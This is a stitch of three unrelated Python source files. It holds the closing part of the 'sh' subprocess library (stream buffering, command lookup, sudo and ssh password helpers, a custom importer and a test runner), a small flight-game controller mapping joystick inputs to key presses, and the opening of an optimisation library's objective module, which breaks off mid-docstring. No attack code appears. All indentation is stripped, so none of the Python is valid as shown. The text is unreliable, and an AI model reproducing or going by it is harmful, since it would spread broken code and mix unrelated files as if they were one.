# is done altogether being read from, we remove it from our list of
# things to poll. when no more things are left to poll, we leave this
# loop and clean up
while poller:
changed = no_interrupt(poller.poll, 0.1)
for f, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
log.debug("%r ready to be read from", f)
done = f.read()
if done:
poller.unregister(f)
elif events & POLLER_EVENT_ERROR:
# for some reason, we have to just ignore streams that have had an
# error. i'm not exactly sure why, but don't remove this until we
# figure that out, and create a test for it
pass
if timeout_event and timeout_event.is_set():
break
if stop_output_event.is_set():
break
# we need to wait until the process is guaranteed dead before closing our
# outputs, otherwise SIGPIPE
alive, _ = is_alive()
while alive:
quit_thread.wait(1)
alive, _ = is_alive()
if stdout:
stdout.close()
if stderr:
stderr.close()
class DoneReadingForever(Exception):
pass
class NotYetReadyToRead(Exception):
pass
def determine_how_to_read_input(input_obj):
""" given some kind of input object, return a function that knows how to
read chunks of that input object.
each reader function should return a chunk and raise a DoneReadingForever
exception, or return None, when there's no more data to read
NOTE: the function returned does not need to care much about the requested
buffering type (eg, unbuffered vs newline-buffered). the StreamBufferer
will take care of that. these functions just need to return a
reasonably-sized chunk of data. """
if isinstance(input_obj, Queue):
log_msg = "queue"
get_chunk = get_queue_chunk_reader(input_obj)
elif callable(input_obj):
log_msg = "callable"
get_chunk = get_callable_chunk_reader(input_obj)
# also handles stringio
elif hasattr(input_obj, "read"):
log_msg = "file descriptor"
get_chunk = get_file_chunk_reader(input_obj)
elif isinstance(input_obj, basestring):
log_msg = "string"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, bytes):
log_msg = "bytes"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, GeneratorType):
log_msg = "generator"
get_chunk = get_iter_chunk_reader(iter(input_obj))
elif input_obj is None:
log_msg = "None"
def raise_():
raise DoneReadingForever
get_chunk = raise_
else:
try:
it = iter(input_obj)
except TypeError:
raise Exception("unknown input object")
else:
log_msg = "general iterable"
get_chunk = get_iter_chunk_reader(it)
return get_chunk, log_msg
def get_queue_chunk_reader(stdin):
def fn():
try:
chunk = stdin.get(True, 0.1)
except Empty:
raise NotYetReadyToRead
if chunk is None:
raise DoneReadingForever
return chunk
return fn
def get_callable_chunk_reader(stdin):
def fn():
try:
data = stdin()
except DoneReadingForever:
raise
if not data:
raise DoneReadingForever
return data
return fn
def get_iter_string_reader(stdin):
""" return an iterator that returns a chunk of a string every time it is
called. notice that even though bufsize_type might be line buffered, we're
not doing any line buffering here. that's because our StreamBufferer
handles all buffering. we just need to return a reasonable-sized chunk. """
bufsize = 1024
iter_str = (stdin[i:i + bufsize] for i in range(0, len(stdin), bufsize))
return get_iter_chunk_reader(iter_str)
def get_iter_chunk_reader(stdin):
def fn():
try:
if IS_PY3:
chunk = stdin.__next__()
else:
chunk = stdin.next()
return chunk
except StopIteration:
raise DoneReadingForever
return fn
def get_file_chunk_reader(stdin):
bufsize = 1024
def fn():
# python 3.* includes a fileno on stringios, but accessing it throws an
# exception. that exception is how we'll know we can't do a poll on
# stdin
is_real_file = True
if IS_PY3:
try:
stdin.fileno()
except UnsupportedOperation:
is_real_file = False
# this poll is for files that may not yet be ready to read. we test
# for fileno because StringIO/BytesIO cannot be used in a poll
if is_real_file and hasattr(stdin, "fileno"):
poller = Poller()
poller.register_read(stdin)
changed = poller.poll(0.1)
ready = False
for fd, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
ready = True
if not ready:
raise NotYetReadyToRead
chunk = stdin.read(bufsize)
if not chunk:
raise DoneReadingForever
else:
return chunk
return fn
def bufsize_type_to_bufsize(bf_type):
""" for a given bufsize type, return the actual bufsize we will read.
notice that although 1 means "newline-buffered", we're reading a chunk size
of 1024. this is because we have to read something. we let a
StreamBufferer instance handle splitting our chunk on newlines """
# newlines
if bf_type == 1:
bufsize = 1024
# unbuffered
elif bf_type == 0:
bufsize = 1
# or buffered by specific amount
else:
bufsize = bf_type
return bufsize
class StreamWriter(object):
""" StreamWriter reads from some input (the stdin param) and writes to a fd
(the stream param). the stdin may be a Queue, a callable, something with
the "read" method, a string, or an iterable """
def __init__(self, log, stream, stdin, bufsize_type, encoding, tty_in):
self.stream = stream
self.stdin = stdin
self.log = log
self.encoding = encoding
self.tty_in = tty_in
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding)
self.get_chunk, log_msg = determine_how_to_read_input(stdin)
self.log.debug("parsed stdin as a %s", log_msg)
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def write(self):
""" attempt to get a chunk of data to write to our child process's
stdin, then write it. the return value answers the questions "are we
done writing forever?" """
# get_chunk may sometimes return bytes, and sometimes return strings
# because of the nature of the different types of STDIN objects we
# support
try:
chunk = self.get_chunk()
if chunk is None:
raise DoneReadingForever
except DoneReadingForever:
self.log.debug("done reading")
if self.tty_in:
# EOF time
try:
char = termios.tcgetattr(self.stream)[6][termios.VEOF]
except: # noqa: E722
char = chr(4).encode()
# normally, one EOF should be enough to signal to an program
# that is read()ing, to return 0 and be on your way. however,
# some programs are misbehaved, like python3.1 and python3.2.
# they don't stop reading sometimes after read() returns 0.
# this can be demonstrated with the following program:
#
# import sys
# sys.stdout.write(sys.stdin.read())
#
# then type 'a' followed by ctrl-d 3 times. in python
# 2.6,2.7,3.3,3.4,3.5,3.6, it only takes 2 ctrl-d to terminate.
# however, in python 3.1 and 3.2, it takes all 3.
#
# so here we send an extra EOF along, just in case. i don't
# believe it can hurt anything
os.write(self.stream, char)
os.write(self.stream, char)
return True
except NotYetReadyToRead:
self.log.debug("received no data")
return False
# if we're not bytes, make us bytes
if IS_PY3 and not isinstance(chunk, bytes):
chunk = chunk.encode(self.encoding)
for proc_chunk in self.stream_bufferer.process(chunk):
self.log.debug("got chunk size %d: %r", len(proc_chunk), proc_chunk[:30])
self.log.debug("writing chunk to process")
try:
os.write(self.stream, proc_chunk)
except OSError:
self.log.debug("OSError writing stdin chunk")
return True
def close(self):
self.log.debug("closing, but flushing first")
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
try:
if chunk:
os.write(self.stream, chunk)
except OSError:
pass
os.close(self.stream)
def determine_how_to_feed_output(handler, encoding, decode_errors):
if callable(handler):
process, finish = get_callback_chunk_consumer(handler, encoding, decode_errors)
# in py3, this is used for bytes
elif isinstance(handler, (cStringIO, iocStringIO)):
process, finish = get_cstringio_chunk_consumer(handler)
# in py3, this is used for unicode
elif isinstance(handler, (StringIO, ioStringIO)):
process, finish = get_stringio_chunk_consumer(handler, encoding, decode_errors)
elif hasattr(handler, "write"):
process, finish = get_file_chunk_consumer(handler)
else:
try:
handler = int(handler)
except (ValueError, TypeError):
def process(chunk): return False # noqa: E731
def finish(): return None # noqa: E731
else:
process, finish = get_fd_chunk_consumer(handler)
return process, finish
def get_fd_chunk_consumer(handler):
handler = fdopen(handler, "w", closefd=False)
return get_file_chunk_consumer(handler)
def get_file_chunk_consumer(handler):
if getattr(handler, "encoding", None):
def encode(chunk): return chunk.decode(handler.encoding) # noqa: E731
else:
def encode(chunk): return chunk # noqa: E731
if hasattr(handler, "flush"):
flush = handler.flush
else:
def flush(): return None # noqa: E731
def process(chunk):
handler.write(encode(chunk))
# we should flush on an fd. chunk is already the correctly-buffered
# size, so we don't need the fd buffering as well
flush()
return False
def finish():
flush()
return process, finish
def get_callback_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
# try to use the encoding first, if that doesn't work, send
# the bytes, because it might be binary
try:
chunk = chunk.decode(encoding, decode_errors)
except UnicodeDecodeError:
pass
return handler(chunk)
def finish():
pass
return process, finish
def get_cstringio_chunk_consumer(handler):
def process(chunk):
handler.write(chunk)
return False
def finish():
pass
return process, finish
def get_stringio_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
handler.write(chunk.decode(encoding, decode_errors))
return False
def finish():
pass
return process, finish
class StreamReader(object):
""" reads from some output (the stream) and sends what it just read to the
handler. """
def __init__(self, log, stream, handler, buffer, bufsize_type, encoding, decode_errors, pipe_queue=None,
save_data=True):
self.stream = stream
self.buffer = buffer
self.save_data = save_data
self.encoding = encoding
self.decode_errors = decode_errors
self.pipe_queue = None
if pipe_queue:
self.pipe_queue = weakref.ref(pipe_queue)
self.log = log
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding, self.decode_errors)
self.bufsize = bufsize_type_to_bufsize(bufsize_type)
self.process_chunk, self.finish_chunk_processor = \
determine_how_to_feed_output(handler, encoding, decode_errors)
self.should_quit = False
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def close(self):
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
if chunk:
self.write_chunk(chunk)
self.finish_chunk_processor()
if self.pipe_queue and self.save_data:
self.pipe_queue().put(None)
os.close(self.stream)
def write_chunk(self, chunk):
# in PY3, the chunk coming in will be bytes, so keep that in mind
if not self.should_quit:
self.should_quit = self.process_chunk(chunk)
if self.save_data:
self.buffer.append(chunk)
if self.pipe_queue:
self.log.debug("putting chunk onto pipe: %r", chunk[:30])
self.pipe_queue().put(chunk)
def read(self):
# if we're PY3, we're reading bytes, otherwise we're reading
# str
try:
chunk = no_interrupt(os.read, self.stream, self.bufsize)
except OSError as e:
self.log.debug("got errno %d, done reading", e.errno)
return True
if not chunk:
self.log.debug("got no chunk, done reading")
return True
self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
for chunk in self.stream_bufferer.process(chunk):
self.write_chunk(chunk)
class StreamBufferer(object):
""" this is used for feeding in chunks of stdout/stderr, and breaking it up
into chunks that will actually be put into the internal buffers. for
example, if you have two processes, one being piped to the other, and you
want that, first process to feed lines of data (instead of the chunks
however they come in), OProc will use an instance of this class to chop up
the data and feed it as lines to be sent down the pipe """
def __init__(self, buffer_type, encoding=DEFAULT_ENCODING, decode_errors="strict"):
# 0 for unbuffered, 1 for line, everything else for that amount
self.type = buffer_type
self.buffer = []
self.n_buffer_count = 0
self.encoding = encoding
self.decode_errors = decode_errors
# this is for if we change buffering types. if we change from line
# buffered to unbuffered, its very possible that our self.buffer list
# has data that was being saved up (while we searched for a newline).
# we need to use that up, so we don't lose it
self._use_up_buffer_first = False
# the buffering lock is used because we might change the buffering
# types from a different thread. for example, if we have a stdout
# callback, we might use it to change the way stdin buffers. so we
# lock
self._buffering_lock = threading.RLock()
self.log = Logger("stream_bufferer")
def change_buffering(self, new_type):
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock for changing buffering")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for changing buffering")
try:
if new_type == 0:
self._use_up_buffer_first = True
self.type = new_type
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for changing buffering")
def process(self, chunk):
# MAKE SURE THAT THE INPUT IS PY3 BYTES
# THE OUTPUT IS ALWAYS PY3 BYTES
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type)
self._buffering_lock.acquire()
self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type)
try:
# unbuffered
if self.type == 0:
if self._use_up_buffer_first:
self._use_up_buffer_first = False
to_write = self.buffer
self.buffer = []
to_write.append(chunk)
return to_write
return [chunk]
# line buffered
elif self.type == 1:
total_to_write = []
nl = "\n".encode(self.encoding)
while True:
newline = chunk.find(nl)
if newline == -1:
break
chunk_to_write = chunk[:newline + 1]
if self.buffer:
chunk_to_write = b"".join(self.buffer) + chunk_to_write
self.buffer = []
self.n_buffer_count = 0
chunk = chunk[newline + 1:]
total_to_write.append(chunk_to_write)
if chunk:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
return total_to_write
# N size buffered
else:
total_to_write = []
while True:
overage = self.n_buffer_count + len(chunk) - self.type
if overage >= 0:
ret = "".encode(self.encoding).join(self.buffer) + chunk
chunk_to_write = ret[:self.type]
chunk = ret[self.type:]
total_to_write.append(chunk_to_write)
self.buffer = []
self.n_buffer_count = 0
else:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
break
return total_to_write
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type)
def flush(self):
self.log.debug("acquiring buffering lock for flushing buffer")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for flushing buffer")
try:
ret = "".encode(self.encoding).join(self.buffer)
self.buffer = []
return ret
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for flushing buffer")
def with_lock(lock):
def wrapped(fn):
fn = contextmanager(fn)
@contextmanager
def wrapped2(*args, **kwargs):
with lock:
with fn(*args, **kwargs):
yield
return wrapped2
return wrapped
@with_lock(PUSHD_LOCK)
def pushd(path):
""" pushd changes the actual working directory for the duration of the
context, unlike the _cwd arg this will work with other built-ins such as
sh.glob correctly """
orig_path = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(orig_path)
@contextmanager
def _args(**kwargs):
""" allows us to temporarily override all the special keyword parameters in
a with context """
kwargs_str = ",".join(["%s=%r" % (k, v) for k, v in kwargs.items()])
raise DeprecationWarning("""
sh.args() has been deprecated because it was never thread safe. use the
following instead:
sh2 = sh({kwargs})
sh2.your_command()
or
sh2 = sh({kwargs})
from sh2 import your_command
your_command()
""".format(kwargs=kwargs_str))
class Environment(dict):
""" this allows lookups to names that aren't found in the global scope to be
searched for as a program name. for example, if "ls" isn't found in this
module's scope, we consider it a system program and try to find it.
we use a dict instead of just a regular object as the base class because the
exec() statement used in the run_repl requires the "globals" argument to be a
dictionary """
# this is a list of all of the names that the sh module exports that will
# not resolve to functions. we don't want to accidentally shadow real
# commands with functions/imports that we define in sh.py. for example,
# "import time" may override the time system program
whitelist = set((
"Command",
"RunningCommand",
"CommandNotFound",
"DEFAULT_ENCODING",
"DoneReadingForever",
"ErrorReturnCode",
"NotYetReadyToRead",
"SignalException",
"ForkException",
"TimeoutException",
"StreamBufferer",
"__project_url__",
"__version__",
"__file__",
"_args",
"pushd",
"glob",
"contrib",
))
def __init__(self, globs, baked_args=None):
""" baked_args are defaults for the 'sh' execution context. for
example:
tmp = sh(_out=StringIO())
'out' would end up in here as an entry in the baked_args dict """
super(dict, self).__init__()
self.globs = globs
self.baked_args = baked_args or {}
def __getitem__(self, k):
if k == 'args':
# Let the deprecated '_args' context manager be imported as 'args'
k = '_args'
# if we're trying to import something real, see if it's in our global scope.
# what defines "real" is that it's in our whitelist
if k in self.whitelist:
return self.globs[k]
# somebody tried to be funny and do "from sh import *"
if k == "__all__":
warnings.warn("Cannot import * from sh. Please import sh or import programs individually.")
return []
# check if we're naming a dynamically generated ReturnCode exception
exc = get_exc_from_name(k)
if exc:
return exc
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
if k.startswith("__") and k.endswith("__"):
raise AttributeError
# is it a custom builtin?
builtin = getattr(self, "b_" + k, None)
if builtin:
return builtin
# is it a command?
cmd = resolve_command(k, self.baked_args)
if cmd:
return cmd
# how about an environment variable?
# this check must come after testing if its a command, because on some
# systems, there are an environment variables that can conflict with
# command names.
# https://github.com/amoffat/sh/issues/238
try:
return os.environ[k]
except KeyError:
pass
# nothing found, raise an exception
raise CommandNotFound(k)
# methods that begin with "b_" are custom builtins and will override any
# program that exists in our path. this is useful for things like
# common shell builtins that people are used to, but which aren't actually
# full-fledged system binaries
@staticmethod
def b_cd(path=None):
if path:
os.chdir(path)
else:
os.chdir(os.path.expanduser('~'))
@staticmethod
def b_which(program, paths=None):
return which(program, paths)
class Contrib(ModuleType): # pragma: no cover
@classmethod
def __call__(cls, name):
def wrapper1(fn):
@property
def cmd_getter(self):
cmd = resolve_command(name)
if not cmd:
raise CommandNotFound(name)
new_cmd = fn(cmd)
return new_cmd
setattr(cls, name, cmd_getter)
return fn
return wrapper1
mod_name = __name__ + ".contrib"
contrib = Contrib(mod_name)
sys.modules[mod_name] = contrib
@contrib("git")
def git(orig): # pragma: no cover
""" most git commands play nicer without a TTY """
cmd = orig.bake(_tty_out=False)
return cmd
@contrib("sudo")
def sudo(orig): # pragma: no cover
""" a nicer version of sudo that uses getpass to ask for a password, or
allows the first argument to be a string password """
prompt = "[sudo] password for %s: " % getpass.getuser()
def stdin():
pw = getpass.getpass(prompt=prompt) + "\n"
yield pw
def process(a, kwargs):
password = kwargs.pop("password", None)
if password is None:
pass_getter = stdin()
else:
pass_getter = password.rstrip("\n") + "\n"
kwargs["_in"] = pass_getter
return a, kwargs
cmd = orig.bake("-S", _arg_preprocess=process)
return cmd
@contrib("ssh")
def ssh(orig): # pragma: no cover
""" An ssh command for automatic password login """
class SessionContent(object):
def __init__(self):
self.chars = deque(maxlen=50000)
self.lines = deque(maxlen=5000)
self.line_chars = []
self.last_line = ""
self.cur_char = ""
def append_char(self, char):
if char == "\n":
line = self.cur_line
self.last_line = line
self.lines.append(line)
self.line_chars = []
else:
self.line_chars.append(char)
self.chars.append(char)
self.cur_char = char
@property
def cur_line(self):
line = "".join(self.line_chars)
return line
class SSHInteract(object):
def __init__(self, prompt_match, pass_getter, out_handler, login_success):
self.prompt_match = prompt_match
self.pass_getter = pass_getter
self.out_handler = out_handler
self.login_success = login_success
self.content = SessionContent()
# some basic state
self.pw_entered = False
self.success = False
def __call__(self, char, stdin):
self.content.append_char(char)
if self.pw_entered and not self.success:
self.success = self.login_success(self.content)
if self.success:
return self.out_handler(self.content, stdin)
if self.prompt_match(self.content):
password = self.pass_getter()
stdin.put(password + "\n")
self.pw_entered = True
def process(a, kwargs):
real_out_handler = kwargs.pop("interact")
password = kwargs.pop("password", None)
login_success = kwargs.pop("login_success", None)
prompt_match = kwargs.pop("prompt", None)
prompt = "Please enter SSH password: "
if prompt_match is None:
def prompt_match(content): return content.cur_line.endswith("password: ") # noqa: E731
if password is None:
def pass_getter(): return getpass.getpass(prompt=prompt) # noqa: E731
else:
def pass_getter(): return password.rstrip("\n") # noqa: E731
if login_success is None:
def login_success(content): return True # noqa: E731
kwargs["_out"] = SSHInteract(prompt_match, pass_getter, real_out_handler, login_success)
return a, kwargs
cmd = orig.bake(_out_bufsize=0, _tty_in=True, _unify_ttys=True, _arg_preprocess=process)
return cmd
def run_repl(env): # pragma: no cover
banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n"
print(banner.format(version=__version__))
while True:
try:
line = raw_input("sh> ")
except (ValueError, EOFError):
break
try:
exec(compile(line, "<dummy>", "single"), env, env)
except SystemExit:
break
except: # noqa: E722
print(traceback.format_exc())
# cleans up our last line
print("")
# this is a thin wrapper around THIS module (we patch sys.modules[__name__]).
# this is in the case that the user does a "from sh import whatever"
# in other words, they only want to import certain programs, not the whole
# system PATH worth of commands. in this case, we just proxy the
# import lookup to our Environment class
class SelfWrapper(ModuleType):
def __init__(self, self_module, baked_args=None):
# this is super ugly to have to copy attributes like this,
# but it seems to be the only way to make reload() behave
# nicely. if i make these attributes dynamic lookups in
# __getattr__, reload sometimes chokes in weird ways...
super(SelfWrapper, self).__init__(
name=getattr(self_module, '__name__', None),
doc=getattr(self_module, '__doc__', None)
)
for attr in ["__builtins__", "__file__", "__package__"]:
setattr(self, attr, getattr(self_module, attr, None))
# python 3.2 (2.7 and 3.3 work fine) breaks on osx (not ubuntu)
# if we set this to None. and 3.3 needs a value for __path__
self.__path__ = []
self.__self_module = self_module
self.__env = Environment(globals(), baked_args=baked_args)
def __getattr__(self, name):
return self.__env[name]
def __call__(self, **kwargs):
""" returns a new SelfWrapper object, where all commands spawned from it
have the baked_args kwargs set on them by default """
baked_args = self.__env.baked_args.copy()
baked_args.update(kwargs)
new_mod = self.__class__(self.__self_module, baked_args)
# inspect the line in the parent frame that calls and assigns the new sh
# variable, and get the name of the new variable we're assigning to.
# this is very brittle and pretty much a sin. but it works in 99% of
# the time and the tests pass
#
# the reason we need to do this is because we need to remove the old
# cached module from sys.modules. if we don't, it gets re-used, and any
# old baked params get used, which is not what we want
parent = inspect.stack()[1]
try:
code = parent[4][0].strip()
except TypeError:
# On the REPL or from the commandline, we don't get the source code in the
# top stack frame
# Older versions of pypy don't set parent[1] the same way as CPython or newer versions
# of Pypy so we have to special case that too.
if parent[1] in ('<stdin>', '<string>') or (
parent[1] == '<module>' and platform.python_implementation().lower() == 'pypy'):
# This depends on things like Python's calling convention and the layout of stack
# frames but it's a fix for a bug in a very cornery cornercase so....
module_name = parent[0].f_code.co_names[-1]
else:
raise
else:
parsed = ast.parse(code)
try:
module_name = parsed.body[0].targets[0].id
except Exception:
# Diagnose what went wrong
if not isinstance(parsed.body[0], ast.Assign):
raise RuntimeError("A new execution context must be assigned to a variable")
raise
if module_name == __name__:
raise RuntimeError("Cannot use the name '%s' as an execution context" % __name__)
sys.modules.pop(module_name, None)
return new_mod
def in_importlib(frame):
""" helper for checking if a filename is in importlib guts """
return frame.f_code.co_filename == "<frozen importlib._bootstrap>"
def register_importer():
""" registers our fancy importer that can let us import from a module name,
like:
import sh
tmp = sh()
from tmp import ls
"""
def test(importer_cls):
try:
return importer_cls.__class__.__name__ == ModuleImporterFromVariables.__name__
except AttributeError:
# ran into importer which is not a class instance
return False
already_registered = any([True for i in sys.meta_path if test(i)])
if not already_registered:
importer = ModuleImporterFromVariables(restrict_to=[SelfWrapper.__name__], )
sys.meta_path.insert(0, importer)
return not already_registered
def fetch_module_from_frame(name, frame):
mod = frame.f_locals.get(name, frame.f_globals.get(name, None))
return mod
class ModuleImporterFromVariables(object):
""" a fancy importer that allows us to import from a variable that was
recently set in either the local or global scope, like this:
sh2 = sh(_timeout=3)
from sh2 import ls
"""
def __init__(self, restrict_to=None):
self.restrict_to = set(restrict_to or set())
def find_module(self, mod_fullname, path=None):
""" mod_fullname doubles as the name of the VARIABLE holding our new sh
context. for example:
derp = sh()
from derp import ls
here, mod_fullname will be "derp". keep that in mind as we go through
the rest of this function """
parent_frame = inspect.currentframe().f_back
if parent_frame and parent_frame.f_code.co_name == "find_spec":
parent_frame = parent_frame.f_back
while parent_frame and in_importlib(parent_frame):
parent_frame = parent_frame.f_back
# Calling PyImport_ImportModule("some_module"); via the C API may not
# have a parent frame. Early-out to avoid in_importlib() trying to
# get f_code from None when looking for 'some_module'.
# This also happens when using gevent apparently.
if not parent_frame:
return None
# this line is saying "hey, does mod_fullname exist as a name we've
# defined previously?" the purpose of this is to ensure that
# mod_fullname is really a thing we've defined. if we haven't defined
# it before, then we "can't" import from it
module = fetch_module_from_frame(mod_fullname, parent_frame)
if not module:
return None
# make sure it's a class we're allowed to import from
if module.__class__.__name__ not in self.restrict_to:
return None
return self
def find_spec(self, fullname, path=None, target=None):
""" find_module() is deprecated since Python 3.4 in favor of find_spec() """
from importlib.machinery import ModuleSpec
found = self.find_module(fullname, path)
return ModuleSpec(fullname, found) if found is not None else None
def load_module(self, mod_fullname):
parent_frame = inspect.currentframe().f_back
while in_importlib(parent_frame):
parent_frame = parent_frame.f_back
module = fetch_module_from_frame(mod_fullname, parent_frame)
# we HAVE to include the module in sys.modules, per the import PEP.
# older versions of python were more lenient about this being set, but
# not in >= python3.3, unfortunately. this requirement necessitates the
# ugly code in SelfWrapper.__call__
sys.modules[mod_fullname] = module
module.__loader__ = self
return module
def run_tests(env, locale, a, version, force_select, **extra_env): # pragma: no cover
py_version = "python"
py_version += str(version)
py_bin = which(py_version)
return_code = None
poller = "poll"
if force_select:
poller = "select"
if py_bin:
print("Testing %s, locale %r, poller: %s" % (py_version.capitalize(), locale, poller))
env["SH_TESTS_USE_SELECT"] = str(int(force_select))
env["LANG"] = locale
for k, v in extra_env.items():
env[k] = str(v)
cmd = [py_bin, "-W", "ignore", os.path.join(THIS_DIR, "test.py")] + a[1:]
print("Running %r" % cmd)
return_code = os.spawnve(os.P_WAIT, cmd[0], cmd, env)
return return_code
def main(): # pragma: no cover
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-e", "--envs", dest="envs", default=None, action="append")
parser.add_option("-l", "--locales", dest="constrain_locales", default=None, action="append")
options, parsed_args = parser.parse_args()
# these are essentially restrictions on what envs/constrain_locales to restrict to for
# the tests. if they're empty lists, it means use all available
action = None
if parsed_args:
action = parsed_args[0]
if action in ("test", "travis", "tox"):
import test
coverage = None
if test.HAS_UNICODE_LITERAL:
try:
import coverage
except ImportError:
pass
env = os.environ.copy()
env["SH_TESTS_RUNNING"] = "1"
if coverage:
test.append_module_path(env, coverage)
# if we're testing locally, run all versions of python on the system
if action == "test":
all_versions = ("2.6", "2.7", "3.1", "3.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8")
# if we're testing on travis or tox, just use the system's default python, since travis will spawn a vm per
# python version in our .travis.yml file, and tox will run its matrix via tox.ini
else:
v = sys.version_info
sys_ver = "%d.%d" % (v[0], v[1])
all_versions = (sys_ver,)
all_force_select = [True]
if HAS_POLL:
all_force_select.append(False)
all_locales = ("en_US.UTF-8", "C")
i = 0
ran_versions = set()
for locale in all_locales:
# make sure this locale is allowed
if options.constrain_locales and locale not in options.constrain_locales:
continue
for version in all_versions:
# make sure this version is allowed
if options.envs and version not in options.envs:
continue
for force_select in all_force_select:
env_copy = env.copy()
ran_versions.add(version)
exit_code = run_tests(env_copy, locale, parsed_args, version, force_select, SH_TEST_RUN_IDX=i)
if exit_code is None:
print("Couldn't find %s, skipping" % version)
elif exit_code != 0:
print("Failed for %s, %s" % (version, locale))
exit(1)
i += 1
print("Tested Python versions: %s" % ",".join(sorted(list(ran_versions))))
else:
env = Environment(globals())
run_repl(env)
if __name__ == "__main__": # pragma: no cover
# we're being run as a stand-alone script
main()
else:
# we're being imported from somewhere
sys.modules[__name__] = SelfWrapper(sys.modules[__name__])
register_importer()
|
OutputController.py | import threading
import time
running_threads = []
DIGITAL_PORT_MAPPER = { 'GEARS': 2,
'LEFT_PEDAL': 3,
'RIGHT_PEDAL': 4,
'FLAPS': 5,
'BRAKE': 6,
'AIR_BRAKE': 7,
'BOMB': 8,
'ROCKET': 9,
'JUMP':10,
'RELOAD':11,
'INIT_GROUND_OR_AIR':12,
'DIG_MISC1':13}
ANALOG_PORT_MAPPER = { 'THROTTLE': 0,
'ELEVATOR': 1,
'AILERONS': 2,
'RUDDER': 3,
'ANALOG_MISC1': 4,
'ANALOG_MISC2': 5}
KEYBOARD_CONTROLL = {'TOGGLE_GEARS': 'g'}
class State():
def __init__(self, first, serial_input, headset_input, keys=[]):
self.first = first
self.digital_input, self.analog_input = serial_input
self.headset_input = headset_input
[self.set_state_by_key(key) for key in keys]
if len(self.analog_input) != 6: raise Exception('analog size was wrong')
def set_state_by_key(self, key):
if key in DIGITAL_PORT_MAPPER:
self.__dict__.update({key.lower(): self.digital_input[DIGITAL_PORT_MAPPER[key.upper()]]})
elif key in ANALOG_PORT_MAPPER:
self.__dict__.update({key.lower(): self.analog_input[ANALOG_PORT_MAPPER[key.upper()]]})
else:
raise Exception('Key not found')
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return 'State:' + str(self)
class OutputController():
def __init__(self, keyboard, mouse):
self.state = self.update(None)
self.keyboard = keyboard
self.mouse = mouse
def update(self, new_input, headset_input=None):
if new_input is None:
print("Waiting for new inputs") # TODO change to logger
self.state = None
return
first = self.state is None # TODO: check if this is really usefull
self.old_state = self.state
self.state = State( first,
new_input,
headset_input,
keys=[ 'GEARS',
'THROTTLE',])
self.output_over_state_diff(self.state, self.old_state)
def output_over_state_diff(self, state, old_state):
if old_state is None:
print('TODO old state is None') # TODO old state is None
return
if old_state.gears != state.gears:
self.press_release(KEYBOARD_CONTROLL['TOGGLE_GEARS'])
def set_gear(self, first):
self.gears = self.digital_input[DIGITAL_PORT_MAPPER['GEARS']]
def press_release(self, key, release_time=0.1):
def assync_press():
if key in running_threads: return
running_threads.append(key)
self.keyboard.press(key);
time.sleep(release_time)
self.keyboard.release(key)
running_threads.remove(key)
thr = threading.Thread(target=assync_press)
thr.start()
def rising_edge(old, new):
return (old == '0' and new == '1')
|
objective.py | # Copyright (c) 2016, the GPyOpt Authors
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import time
import numpy as np
from ...util.general import spawn
#from ...util.general import get_d_moments
# import GPy
# import GPyOpt
class Objective(object):
"""
General class to handle the objective function internally.
"""
def evaluate(self, x):
raise NotImplementedError()
class SingleObjective(Objective):
"""
Class to handle problems with one single objective function.
param func: objective function.
param batch_size: size of the batches (default, 1)
param num_cores: number of cores to use in the process of evaluating the objective (default, 1).
param objective_name: name of the objective function.
param batch_type: Type of batch used. Only 'synchronous' evaluations are possible at the moment.
param space: Not in use.
.. Note:: the objective function should take 2-dimensional numpy arrays as input and outputs. Each row should
contain a location (in the case of the inputs) or a function evaluation (in the case of the outputs).
"""
def __init__(self, func, num_cores = 1, objective_name = 'no_name', batch_type = 'synchronous', space = None, output_dim = 1):
self.func = func
self.n_procs = num_cores
self.num_evaluations = 0
self.space = space
self.objective_name = objective_name
self.output_dim = output_dim
def evaluate(self, x):
"""
Performs the evaluation of the objective at x.
"""
if self.n_procs == 1:
f_evals, cost_evals = self._eval_func(x)
else:
try:
f_evals, cost_evals = self._syncronous_batch_evaluation(x)
except:
if not hasattr(self, 'parallel_error'):
print('Error in parallel computation. Fall back to single process!')
else:
self.parallel_error = True
f_evals, cost_evals = self._eval_func(x)
return f_evals, cost_evals
def _eval_func(self, x):
"""
Performs sequential evaluations of the function at x (single location or batch). The computing time of each
evaluation is also provided.
"""
cost_evals = []
f_evals = np.empty(shape=[0, self.output_dim])
for i in range(x.shape[0]):
st_time = time.time()
rlt = self.func(np.atleast_2d(x[i]))
f_evals = np.vstack([f_evals,rlt])
cost_evals += [time.time()-st_time]
return f_evals, cost_evals
def _syncronous_batch_evaluation(self,x):
"""
Evaluates the function a x, where x can be a single location or a batch. The evaluation is performed in parallel
according to the number of accessible cores.
